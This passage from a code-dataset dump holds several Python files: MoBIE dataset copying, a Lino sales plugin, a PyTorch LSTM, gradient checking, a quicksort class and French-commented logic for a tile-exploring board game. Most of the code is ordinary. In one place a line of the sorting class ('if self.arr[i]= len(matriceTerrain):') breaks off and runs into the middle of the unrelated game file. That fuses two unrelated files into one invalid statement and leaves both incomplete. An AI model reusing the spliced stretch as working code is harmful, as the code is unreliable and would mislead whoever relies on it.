copy_misc=None):\n copy_image_data(src_folder, dst_folder, exclude_prefixes)\n copy_misc_data(src_folder, dst_folder, copy_misc)\n copy_segmentations(src_folder, dst_folder, exclude_prefixes)\n copy_all_tables(src_folder, dst_folder)\n copy_and_check_image_dict(src_folder, dst_folder,\n exclude_prefixes=exclude_prefixes)\n","sub_path":"mobie/metadata/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"215771375","text":"# Copyright 2014-2018 Rumma & Ko Ltd\n# License: BSD (see file COPYING for details)\n\n\"\"\"Adds functionality for handling sales.\nSee :doc:`/specs/sales`.\n\n\n.. autosummary::\n :toctree:\n\n fixtures.std\n fixtures.demo_bookings\n\n\"\"\"\n\nfrom lino.api import ad\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Plugin(ad.Plugin):\n \"See :class:`lino.core.plugin.Plugin`.\"\n\n verbose_name = _(\"Product invoices\")\n\n needs_plugins = ['lino_xl.lib.products', 'lino_xl.lib.vat']\n\n def setup_reports_menu(self, site, user_type, m):\n mg = site.plugins.accounts\n # mg = site.plugins.vat\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('sales.DueInvoices')\n m.add_action('sales.PrintableInvoicesByJournal')\n\n def setup_config_menu(self, site, user_type, m):\n mg = site.plugins.vat\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('sales.PaperTypes')\n \n def setup_explorer_menu(self, site, user_type, m):\n mg = site.plugins.vat\n m = m.add_menu(mg.app_label, mg.verbose_name)\n # m = m.add_menu(self.app_label, self.verbose_name)\n m.add_action('sales.Invoices')\n m.add_action('sales.InvoiceItems')\n","sub_path":"lino_xl/lib/sales/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"380675893","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass LSTMSampleWise(nn.Module):\n def __init__(self, config):\n super(LSTMSampleWise, self).__init__()\n\n self.config = config\n\n dropout = 0 if config.n_layers<2 else config.dp_ratio\n\n\n\n self.lstm = nn.LSTM(input_size=config.input_dim,\n hidden_size=config.d_hidden,\n num_layers=config.n_layers,\n batch_first=True,\n dropout=dropout)\n\n self.dropout = nn.Dropout(config.dp_ratio)\n\n self.linear = nn.Linear(config.d_hidden, config.num_classes)\n\n # self.init_hidden(config.batch_size)\n\n self.softmax = nn.Softmax(dim=2)\n self.hidden = None\n\n def init_hidden(self, batch_size):\n # Before we've done anything, we dont have any hidden state.\n # Refer to the Pytorch documentation to see exactly\n # why they have this dimensionality.\n # The axes semantics are (num_layers, minibatch_size, hidden_dim)\n\n\n\n self.hidden = (torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden),\n torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden))\n\n # self.hidden_last = (torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden),\n # torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden))\n #\n # self.last_batch_size = batch_size\n def clear_hidden(self):\n self.hidden = None\n def reuse_hidden(self):\n h = self.hidden[0]\n c = self.hidden[1]\n h = torch.tensor(h.detach())\n c = torch.tensor(c.detach())\n self.hidden = (h, c)\n\n def forward(self, inputs):\n batch_size = inputs.size()[0]\n\n # if self.hidden is None:\n # self.init_hidden(batch_size)\n # else:\n # self.reuse_hidden()\n self.init_hidden(batch_size)\n\n\n\n # if batch_size != self.last_batch_size:\n # if batch_size > self.last_batch_size:\n #\n # print(batch_size)\n\n # print(inputs.shape)\n\n\n\n outputs, self.hidden = self.lstm(\n inputs, self.hidden)\n\n # print('output.shape = ' + str(outputs.shape))\n h = self.dropout(outputs)\n\n x = self.linear(h)\n # print('x.shape = ' + str(x.shape))\n # raise Exception('I know Python!')\n # x = x.view(-1, self.config.num_classes)\n # x = self.softmax(x)\n x = x.view(-1, self.config.num_classes)\n # b = x[0, 0, :]\n #\n # print('b.shape = ' + str(b.shape))\n # print('b = ' + str(b))\n #\n # a = torch.sum(b)\n # print('sum = ' + str(a))\n return x","sub_path":"har_pytorch/model_lstm_reuse_c.py","file_name":"model_lstm_reuse_c.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"57164212","text":"import numpy as np\n\nfrom forward_propagation import forward_propagation\nfrom compute_cost import compute_cost\n\nfrom regularization import compute_cost_with_regularization\nfrom dropout import forward_propagation_with_dropout\n\n\ndef dictionary_to_vector(parameters):\n for i, key in enumerate(parameters.keys()):\n new_vector = np.reshape(parameters[key], (-1, 1))\n if i == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n \n return theta\n\n\ndef vector_to_dictionary(theta, layers_dims):\n L = len(layers_dims)\n parameters = {}\n k = 0\n for l in range(1, L):\n # Create tmp variable to store dimension used on each layer\n w_dim = layers_dims[l] * layers_dims[l-1]\n b_dim = layers_dims[l]\n\n # Create tmp var to be used in slicing theta vector\n tmp_dim = k + w_dim\n \n # Add theta to the dictionary\n parameters[f'W{l}'] = theta[k:tmp_dim].reshape(layers_dims[l], layers_dims[l-1])\n parameters[f'b{l}'] = theta[tmp_dim:tmp_dim + b_dim].reshape(b_dim, 1)\n\n k += w_dim + b_dim\n \n return parameters\n\n\ndef gradients_to_vector(gradients, num_of_layers):\n L = num_of_layers\n keys = []\n for l in range(1, L):\n keys.append(f'dW{l}')\n keys.append(f'db{l}')\n\n filtered_gradients = {}\n for key in keys:\n filtered_gradients[key] = gradients[key]\n\n gradients = filtered_gradients\n\n for i, key in enumerate(gradients):\n new_vector = np.reshape(gradients[key], (-1, 1))\n if i == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n \n return theta\n\n\n# Gradient checking\ndef gradient_checking(parameters, gradients, X, Y, layers_dims, _lambda=0, keep_prob=1, epsilon=1e-7):\n # Set-up variables\n parameters_values = dictionary_to_vector(parameters)\n grad = gradients_to_vector(gradients, len(layers_dims))\n num_of_parameters = parameters_values.shape[0]\n J_plus = np.zeros((num_of_parameters, 1))\n J_minus = np.zeros((num_of_parameters, 1))\n grad_approx = np.zeros((num_of_parameters, 1))\n num_of_layers = len(layers_dims) - 1\n\n # Compute grad_approx\n for i in range(num_of_parameters):\n # Compute J_plus[i]\n theta_plus = np.copy(parameters_values)\n theta_plus[i][0] = theta_plus[i][0] + epsilon\n if keep_prob == 1:\n AL, _ = forward_propagation(X, vector_to_dictionary(theta_plus, layers_dims), num_of_layers)\n elif keep_prob < 1:\n AL, _ = forward_propagation_with_dropout(X, vector_to_dictionary(theta_plus, layers_dims), num_of_layers, keep_prob)\n if _lambda == 0:\n J_plus[i] = compute_cost(AL, Y)\n else:\n J_plus[i] = compute_cost_with_regularization(AL, Y, parameters, _lambda, num_of_layers)\n\n # Compute J_minus[i]\n theta_minus = np.copy(parameters_values)\n theta_minus[i][0] = theta_minus[i][0] - epsilon\n if keep_prob == 1:\n AL, _ = forward_propagation(X, vector_to_dictionary(theta_minus, layers_dims), num_of_layers)\n elif keep_prob < 1:\n AL, _ = forward_propagation_with_dropout(X, vector_to_dictionary(theta_minus, layers_dims), num_of_layers, keep_prob)\n if _lambda == 0:\n J_minus[i] = compute_cost(AL, Y)\n else:\n J_minus[i] = compute_cost_with_regularization(AL, Y, parameters, _lambda, num_of_layers)\n \n # Compute grad_approx[i]\n grad_approx[i] = np.divide(J_plus[i] - J_minus[i], 2 * epsilon)\n\n # Compare gradapprox to backward propagation gradients by computing difference\n numerator = np.linalg.norm(grad - grad_approx)\n denominator = np.linalg.norm(grad) + np.linalg.norm(grad_approx)\n difference = np.divide(numerator, denominator)\n\n if difference > 2e-7:\n print (\"\\033[93m\" + \"There is a mistake in the backward propagation! difference = \" + str(difference) + \"\\033[0m\")\n else:\n print (\"\\033[92m\" + \"Your backward propagation works perfectly fine! difference = \" + str(difference) + \"\\033[0m\")\n \n return difference\n","sub_path":"neural_networks/gradient_checking/gradient_checking.py","file_name":"gradient_checking.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"529416107","text":"import time\n\nclass Ordenamiento():\n\n #constructor\n def __init__(self,arr=[]):\n self.arr=arr\n self.comp=0\n self.tiempoFinal=0\n self.cambios=0\n \n def orden_creciente(self,arr=None):\n\n if(arr!=None):\n self.arr=arr\n if(len(self.arr)<1):\n return [] \n\n izquierda=list([])\n derecha=list([])\n pivote= list([self.arr[0]])\n\n for i in range(1,len(self.arr),1):\n self.comp+=1\n if self.arr[i]= len(matriceTerrain):\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n if colonneVisee < 0 or colonneVisee >= len(matriceTerrain[0]):\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Liste des positions occupées \n valeursDico = list(infoPion.values())\n positionOccupee = [ valeursDico[i][0] for i in range(len(valeursDico)) if i+1 not in listeGagnants]\n \n # Vérification que la case n'est pas occupée\n if (ligneVisee, colonneVisee) in positionOccupee:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Valeur différente de 0 ou None\n if matriceTerrain[ligneVisee][colonneVisee] == 0 or matriceTerrain[ligneVisee][colonneVisee] == None:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Vérification d'absence de mur\n if direction == 0 and mursHor[ligneVisee][colonneVisee]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n elif direction == 1 and mursHor[infoPion[numeroPion][0][0]][infoPion[numeroPion][0][1]]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n elif direction == 2 and mursVer[infoPion[numeroPion][0][0]][infoPion[numeroPion][0][1]]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n elif direction == 3 and mursVer[ligneVisee][colonneVisee]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n \n # Cas où les sorties sont actives et où le pion se déplace sur une sortie\n if sortieActive and matriceTerrain[ligneVisee][colonneVisee] == 'sortie':\n listeGagnants.append(numeroPion) # On ajoute le pion à la liste des gagnants\n \n # Gérer les gardes :\n # liste des tuiles utilisées par les pions\n listeTuilesPion = list()\n for pion in range(1, 5):\n if pion not in listeGagnants:\n ligne, colonne = infoPion[pion][0]\n listeTuilesPion.append(matriceTuiles[ligne][colonne][0])\n \n # liste des tuiles utilisées par les gardes\n listeTuilesGarde = list()\n for pion in infoPion.keys():\n if pion > 4:\n ligne, colonne = infoPion[pion][0]\n listeTuilesGarde.append(matriceTuiles[ligne][colonne][0])\n \n \n # Cas où un pion veut se déplacer sur la tuile d'un garde :\n if numeroPion in range(1, 5):\n if matriceTuiles[ligneVisee][colonneVisee][0] in listeTuilesGarde:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Cas où un garde veut se déplacer sur la tuile d'un pion :\n else:\n if matriceTuiles[ligneVisee][colonneVisee][0] in listeTuilesPion:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Si on arrive là, on peut procéder au déplacement\n infoPion[numeroPion] = [(ligneVisee, colonneVisee), infoPion[numeroPion][0]]\n return\n\n\ndef pionSurObjet(matriceTuiles, matriceTerrain, infoPion):\n \"\"\"\n Vérifie si les pions sont sur leur objets respectifs\n\n Args:\n matriceTerrain (list): matrice qui encode le terrain\n infoPion (dict): dictionnaire des positions des joueurs\n Returns:\n True si tous les pions sont sur les bons objets\n False si ne serait-ce qu'un pion n'est pas sur son objet\n\n >>> infoPion = {1 : [(4, 7),(1, 1)], 2 : [(4, 8),(1, 1)], 3 : [(7, 7),(1, 1)], 4 : [(7,8),(1, 1)]}\n >>> pionSurObjet(matriceTerrain, infoPion)\n True\n >>> infoPion = {1 : [(4, 8),(1, 1)], 2 : [(4, 8),(1, 1)], 3 : [(7, 7),(1, 1)], 4 : [(7,8),(1, 1)]}\n >>> pionSurObjet(matriceTerrain, infoPion)\n False\n \"\"\"\n # On initialise un compteur de conditions valides qui, si atteint, signifie que toutes les conditions sont réunies\n # pour activer la sortie\n nb_conditions_valides = 0\n # On vérifie pour chaque pion s'il se trouve sur la case de l'objet qui lui est associé\n # Si le bon pion est sur le bon objet, on incrémente le compteur\n for i in range(1, 5):\n if matriceTerrain[infoPion[i][0][0]][infoPion[i][0][1]] == 'o' + str(i):\n nb_conditions_valides += 1\n # Si le compteur atteint 4, toutes les conditions sont remplies, on renvoie True et on ajoute les 2 gardes supplémentaires\n if nb_conditions_valides == 4:\n ramassageObjets(matriceTerrain, infoPion)\n \n # Il faut trouver les coordonnées de la tuile 2 \n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles)):\n if matriceTuiles[ligne][colonne][0] != \"$\":\n if int(matriceTuiles[ligne][colonne][0]) == 2:\n HG = (ligne, colonne)\n break\n if HG != None:\n break\n \n # Calcul des positions pour les 2 gardes\n direction = int(matriceTuiles[HG[0]][HG[1]][1])\n print(direction)\n garde2 = [[(0, 2), (3, 3), (3, 0), (0, 0)], [(0, 3), (2, 3), (3, 1), (1, 0)]]\n ligne1, ligne2 = HG[0]+garde2[0][direction][0], HG[0]+garde2[1][direction][0]\n colonne1, colonne2 = HG[1]+garde2[0][direction][1], HG[1]+garde2[1][direction][1]\n \n initPions(6, (ligne1, colonne1), infoPion)\n initPions(7, (ligne2, colonne2), infoPion)\n return True\n # Si une condition n'est pas remplie, on renvoie False\n return False\n\n\n sortieActive = True\n ramassageObjets(matriceTerrain, infoPion)\n\ndef pionSurSablier(matriceTerrain, infoPion):\n \"\"\"return True si un pion est sur une case sablier et supprime la case du tableau\"\"\"\n # return False sinon\n for i in range(1, 5):\n if matriceTerrain[infoPion[i][0][0]][infoPion[i][0][1]] == 'sablier':\n matriceTerrain[infoPion[i][0][0]][infoPion[i][0][1]] = 1\n return True\n return False\n\ndef renverserHorizontalement(M):\n \"\"\"Renverse une matrice selon un axe horizontal\"\"\"\n matrice = []\n for i in range(1, len(M) + 1):\n matrice.append(M[-i])\n M[:] = matrice\n\ndef transposer(M):\n \"\"\"Transpose une matrice en place\"\"\"\n if len(M) == len(M[0]):\n n = len(M)\n for i in range(n-1):\n for j in range(i+1, n):\n stock = M[i][j]\n M[i][j] = M[j][i]\n M[j][i] = stock\n else:\n n = len(M)\n m = len(M[0])\n M2 = []\n\n for i in range(m):\n M2.append([0]*n)\n\n for i in range(n):\n for j in range(m):\n M2[j][i] = M[i][j]\n M[:] = M2\n\ndef rotationUnQuart(M):\n \"\"\"Fait tourner de 90 un matrice dans le sens horaire\"\"\"\n renverserHorizontalement(M)\n transposer(M)\n\ndef detecterBord(coordonnees, matrice):\n \"\"\"\n return la direction dans laquelle on explore\n \"\"\"\n dico_positions = {(-1, 0): 0, #haut\n (1, 0): 2, #bas\n (0, -1): 3, #gauche\n (0, 1): 1 #droite\n }\n for position, valeur in dico_positions.items():\n if matrice[coordonnees[0] + position[0]][coordonnees[1] + position[1]] == None:\n return valeur\n\ndef positionTuileExplo(coordonnees, direction):\n \"\"\"\n return les coordonnées sur la matrice où il faut commencer à écrire la tuile explorée\n \"\"\"\n if direction == 0:\n return coordonnees[0] - 4, coordonnees[1] - 1\n if direction == 1:\n return coordonnees[0] - 1, coordonnees[1] + 1\n if direction == 2:\n return coordonnees[0] + 1, coordonnees[1] - 2\n if direction == 3:\n return coordonnees[0] - 2, coordonnees[1] - 4\n \ndef extractionMatriceTuile(choix):\n \"\"\"Renvoie la mini-matriceTerrain ainsi que les matrices de murs horizontaux et \n Verticaux de la tuile selectionnée\"\"\"\n numero, direction = choix\n \n if numero == 2:\n matrice = tuile2()\n murV = tuile2MursV()\n murH = tuile2MursH()\n \n elif numero == 3:\n matrice = tuile3()\n murV = tuile3MursV()\n murH = tuile3MursH()\n \n elif numero == 4:\n matrice = tuile4()\n murV = tuile4MursV()\n murH = tuile4MursH()\n \n elif numero == 5:\n matrice = tuile5()\n murV = tuile5MursV()\n murH = tuile5MursH()\n \n elif numero == 6:\n matrice = tuile6()\n murV = tuile6MursV()\n murH = tuile6MursH()\n \n elif numero == 7:\n matrice = tuile7()\n murV = tuile7MursV()\n murH = tuile7MursH()\n \n elif numero == 8:\n matrice = tuile8()\n murV = tuile8MursV()\n murH = tuile8MursH()\n \n elif numero == 9:\n matrice = tuile9()\n murV = tuile9MursV()\n murH = tuile9MursH()\n \n # rotation de la tuile e fonction de la direction\n for i in range(direction):\n rotationUnQuart(matrice)\n rotationUnQuart(murV)\n rotationUnQuart(murH)\n \n # échange des murs horizontaux et verticaux en fonction de la direction\n if direction%2:\n murV, murH = murH, murV\n \n return matrice, murV, murH\n \n\ndef pionSurExploration(matriceTerrain, matriceTuiles, mursVer, mursHor, infoPion, tuilesRestantes, dicEsc, dic2, dic7, dicVortex, tuilesPosees, exploBool, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes):\n \"\"\"Vérifie si un pion est sur sa case d'exploration, si c'est le cas,\n place une nouvelle tuile au bon endroit\"\"\"\n \n # Vérification de si un pion est sur une case exploration correspondante à\n # une tuile non-explorée\n couplePionPos = list(infoPion.items())\n for pion, position in couplePionPos:\n if (len(tuilesRestantes)>0 and matriceTerrain[position[0][0]][position[0][1]] == 'exp'+str(pion)): #or (matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]] is str and matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1] == 'exp' and modeTelekinesie[0] == 1):\n # if (matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]] is str and matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1] == 'exp' and modeTelekinesie[0] == 1):\n # pion = 3\n # position = infoPion[3][0]\n \n direction = detecterBord(position[0], matriceTerrain)\n if direction == None:\n return\n \n exploAl = exploBool\n # sélection d'une tuile à ajouter au hasard si il n'y a pas de télékinésie\n if exploAl:\n choix = rand.choice(tuilesRestantes)\n tuilesRestantes.remove(choix)\n tuilesPosees.append(choix)\n else:\n telekinesie(matriceTerrain, matriceTuiles, tuilesPosees[telekinesieIndexTuileActive[0]], dicEsc, dicVortex, telekinesiesRestantes)\n choix = tuilesPosees[telekinesieIndexTuileActive[0]]\n telekinesieIndexTuileActive[0] = 0\n \n\n matrice, murV, murH = extractionMatriceTuile((choix, direction))\n \n # trouver la case à partir de laquelle ajouter la tuile sur plateau\n L, C = positionTuileExplo(position[0], direction)\n\n if choix == 2:\n for cle, valeur in dic2[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n if choix == 7:\n for cle, valeur in dic7[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n # changeons les valeurs de matriceTerrain et de matriceTuiles\n matriceTerrain[position[0][0]][position[0][1]] = 1\n \n for ligne in range(len(matrice)):\n for colonne in range(len(matrice[0])):\n matriceTerrain[ligne+L][colonne+C] = matrice[ligne][colonne]\n if matriceTerrain[ligne+L][colonne+C] in ('vortex1', 'vortex2', 'vortex3', 'vortex4'):\n dicVortex[int(matriceTerrain[ligne+L][colonne+C][-1])].append((ligne+L, colonne+C))\n matriceTuiles[ligne+L][colonne+C] = str(choix)+str(direction)\n for ligne in range(len(murV)):\n for colonne in range(len(murV[0])):\n if mursVer[ligne + L][colonne + C - 1] == 0:\n mursVer[ligne + L][colonne + C - 1] = murV[ligne][colonne]\n\n for ligne in range(len(murH)):\n for colonne in range(len(murH[0])):\n if mursHor[ligne + L - 1][colonne + C] == 0:\n mursHor[ligne + L - 1][colonne + C] = murH[ligne][colonne]\n \n # placement des gardes lors de l'apparition de la case 9\n garde9 = [(3,3), (0,3), (0,0), (3,0)]\n if choix == 9:\n initPions(5, (garde9[direction][0]+L, garde9[direction][1]+C), infoPion)\n \n # print(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]], 'moulaga')\n # if type(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]]) is str :\n # print('censé être str',type(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]]))\n # print(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1],'exp')\n # print(modeTelekinesie, '1')\n if (type(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]]) is str and matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1] == 'exp' and modeTelekinesie[0] == 1):\n position = infoPion[3][0]\n \n direction = detecterBord(position, matriceTerrain)\n if direction == None:\n return\n \n telekinesie(matriceTerrain, matriceTuiles, tuilesPosees[telekinesieIndexTuileActive[0]], dicEsc, dicVortex, telekinesiesRestantes)\n choix = tuilesPosees[telekinesieIndexTuileActive[0]]\n telekinesieIndexTuileActive[0] = 0\n matrice, murV, murH = extractionMatriceTuile((choix, direction))\n \n # trouver la case à partir de laquelle ajouter la tuile sur plateau\n L, C = positionTuileExplo(position, direction)\n\n if choix == 2:\n for cle, valeur in dic2[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n if choix == 7:\n for cle, valeur in dic7[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n # changeons les valeurs de matriceTerrain et de matriceTuiles\n matriceTerrain[position[0]][position[1]] = 1\n \n for ligne in range(len(matrice)):\n for colonne in range(len(matrice[0])):\n matriceTerrain[ligne+L][colonne+C] = matrice[ligne][colonne]\n if matriceTerrain[ligne+L][colonne+C] in ('vortex1', 'vortex2', 'vortex3', 'vortex4'):\n dicVortex[int(matriceTerrain[ligne+L][colonne+C][-1])].append((ligne+L, colonne+C))\n matriceTuiles[ligne+L][colonne+C] = str(choix)+str(direction)\n for ligne in range(len(murV)):\n for colonne in range(len(murV[0])):\n if mursVer[ligne + L][colonne + C - 1] == 0:\n mursVer[ligne + L][colonne + C - 1] = murV[ligne][colonne]\n\n for ligne in range(len(murH)):\n for colonne in range(len(murH[0])):\n if mursHor[ligne + L - 1][colonne + C] == 0:\n mursHor[ligne + L - 1][colonne + C] = murH[ligne][colonne]\n \n # placement des gardes lors de l'apparition de la case 9\n garde9 = [(3,3), (0,3), (0,0), (3,0)]\n if choix == 9:\n initPions(5, (garde9[direction][0]+L, garde9[direction][1]+C), infoPion)\n return\n\ndef ramassageObjets(matriceTerrain, infoPion):\n \"\"\"\n \"Ramasse\" les objets sur le terrain et remplace dans matrice terrain 'o1' à 'o4' par 1, qui correspond à une case normale.\n Args:\n matriceTerrain (list) : le terrain de jeu codé en format matriciel\n infoPion (dict) : dictionnaire des postions des pions\n Returns:\n None\n \"\"\"\n \n # On parcourt les positions des joueurs et on remplace la valeur de la case\n # sur laquelle ils sont par 1\n listePions = infoPion.values()\n for positionObjet in listePions:\n ligne = positionObjet[0][0]\n colonne = positionObjet[0][1]\n matriceTerrain[ligne][colonne] = 1\n return\n\ndef selecteurPion(numPion, infoPion, listeGagnants):\n \"\"\"\n Change le pion actuellement en train d'être joué par le suivant.\n Les pions suivent toujours le même roulement.\n Un pion qui a gagné (rentré dans la sortie) est sauté lors du roulement\n Args:\n numPion (int) : les entiers de 1 à 4 sont les valeurs possibles\n infoPion (dict) : dictionnaire contenant les clés correspondant à chaque pion (1 à 4)\n listeGagnants (list) : liste des pions ayant atteint la sortie\n Returns:\n numPion (int) + 1, sauf 4 qui devient 1\n >>> infoPion = {1: [(9, 0), (9, 1)], 2: [(4, 8), (5, 8)], 3: [(7, 7), (6, 7)], 4: [(7, 8), (6, 8)]}\n >>> listeGagnants = []\n >>> selecteurPion(1, infoPion, listeGagnants)\n 2\n >>> selecteurPion(2, infoPion, listeGagnants)\n 3\n >>> selecteurPion(3, infoPion, listeGagnants)\n 4\n >>> selecteurPion(4, infoPion, listeGagnants)\n 1\n >>> listeGagnants = [1, 2, 3]\n >>> selecteurPion(1, infoPion, listeGagnants)\n 4\n \"\"\"\n # On cherche le prochain pion jouable parmi la liste des pions valides (les pions non-gagnants)\n # while True:\n # if ((numPion + 1) % 5 in infoPion) and ((numPion + 1) % 5 not in listeGagnants):\n # return numPion + 1\n # numPion = (numPion + 1) % 5\n numPion += 1\n while numPion in listeGagnants or numPion not in infoPion.keys():\n numPion = numPion+1 if numPion+1 < 8 else 1\n return numPion\n \ndef gestionEntreeClavier(matriceTerrain, mursVer, mursHor, infoPion, pionActif, sortieActive, debugActif, vitesse, listeGagnants, dicVortex, dicEsc, dicTuile2, dicTuile7, modeVortex, vortexActif, touchesPartie, touchesPartieParJoueur, nb_joueurs, touchesDeBase, tempsRestant, matriceTuiles, tuilesRestantes, tuilesPosees, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes):\n \"\"\"\n Regarde sur quelle touche le/les joueurs appuient, et réagit en conséquence\n\n Returns:\n None.\n\n \"\"\"\n # Gestion du mode debug\n if debugActif == 1:\n entreeClavier = tk.attente_touche_jusqua(vitesse)\n if entreeClavier == None:\n entreeClavier = debugMode()\n \n # Mode normal \n else:\n entreeClavier = tk.attente_touche_jusqua(250)\n\n # Gestion des entrées utilisateurs/debug\n if entreeClavier == touchesPartie['haut'][0]:\n deplacementPion(pionActif[touchesPartie['haut'][1]], 0, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n\n elif entreeClavier == touchesPartie['gauche'][0]:\n deplacementPion(pionActif[touchesPartie['gauche'][1]], 3, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n\n elif entreeClavier == touchesPartie['bas'][0]:\n deplacementPion(pionActif[touchesPartie['bas'][1]], 1, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n \n elif entreeClavier == touchesPartie['droite'][0]:\n deplacementPion(pionActif[touchesPartie['droite'][1]], 2, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n\n elif entreeClavier == touchesPartie['escalier'][0]:\n escalier(pionActif[touchesPartie['escalier'][1]], dicEsc, infoPion, listeGagnants)\n\n elif entreeClavier == touchesPartie['vortex'][0][0]:\n if pionActif[touchesPartie['vortex'][1]] < 5:\n activerVortex(pionActif[touchesPartie['vortex'][1]], dicVortex, infoPion, modeVortex, vortexActif, listeGagnants)\n\n elif entreeClavier == touchesPartie['vortex'][0][1] and modeVortex == [1]:\n selectVortex(vortexActif, dicVortex, pionActif[touchesPartie['vortex'][1]])\n\n elif entreeClavier == touchesDeBase[1]['changerPion']:\n pionActif[1] = selecteurPion(pionActif[1], infoPion, listeGagnants)\n\n elif entreeClavier == touchesDeBase[2]['changerPion'] and nb_joueurs in (2, 3):\n pionActif[2] = selecteurPion(pionActif[2], infoPion, listeGagnants)\n\n elif entreeClavier == touchesDeBase[3]['changerPion'] and nb_joueurs == 3:\n pionActif[3] = selecteurPion(pionActif[3], infoPion, listeGagnants)\n\n elif entreeClavier == touchesDeBase[1]['elfe'][0] and pionActif[1] == 3 and telekinesiesRestantes[0] > 0:\n activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, telekinesiesRestantes)\n\n elif entreeClavier == touchesDeBase[2]['elfe'][0] and nb_joueurs in (2, 3) and pionActif[2] == 3 and telekinesiesRestantes[0] > 0:\n activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, telekinesiesRestantes)\n\n elif entreeClavier == touchesDeBase[3]['elfe'][0] and nb_joueurs == 3 and pionActif[3] == 3 and telekinesiesRestantes[0] > 0:\n activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, telekinesiesRestantes)\n\n elif entreeClavier == touchesDeBase[1]['elfe'][1] and modeTelekinesie == [1] and telekinesiesRestantes[0] > 0:\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n\n elif entreeClavier == touchesDeBase[2]['elfe'][1] and nb_joueurs in (2, 3) and modeTelekinesie == [1] and telekinesiesRestantes[0] > 0:\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n\n elif entreeClavier == touchesDeBase[3]['elfe'][1] and nb_joueurs == 3 and modeTelekinesie == [1] and telekinesiesRestantes[0] > 0:\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n\n elif entreeClavier == touchesPartie['vortex'][0][1] and modeVortex == [1]:\n selectVortex(vortexActif, dicVortex, pionActif[touchesPartie['vortex'][1]])\n\n elif entreeClavier == touchesPartie['exploration'][0]:\n pionSurExploration(matriceTerrain, matriceTuiles, mursVer, mursHor, infoPion, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, tuilesPosees, True, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes)\n\n elif entreeClavier == 'w':\n debugActif *= -1\n \n elif entreeClavier == 'x':\n vitesse = vitesse**(-1)\n \n elif entreeClavier == 'twosuperior':\n tempsPause = pause()\n return tempsPause\n \n elif entreeClavier == 'BackSpace':\n sauvegarderPartie(matriceTerrain, infoPion, 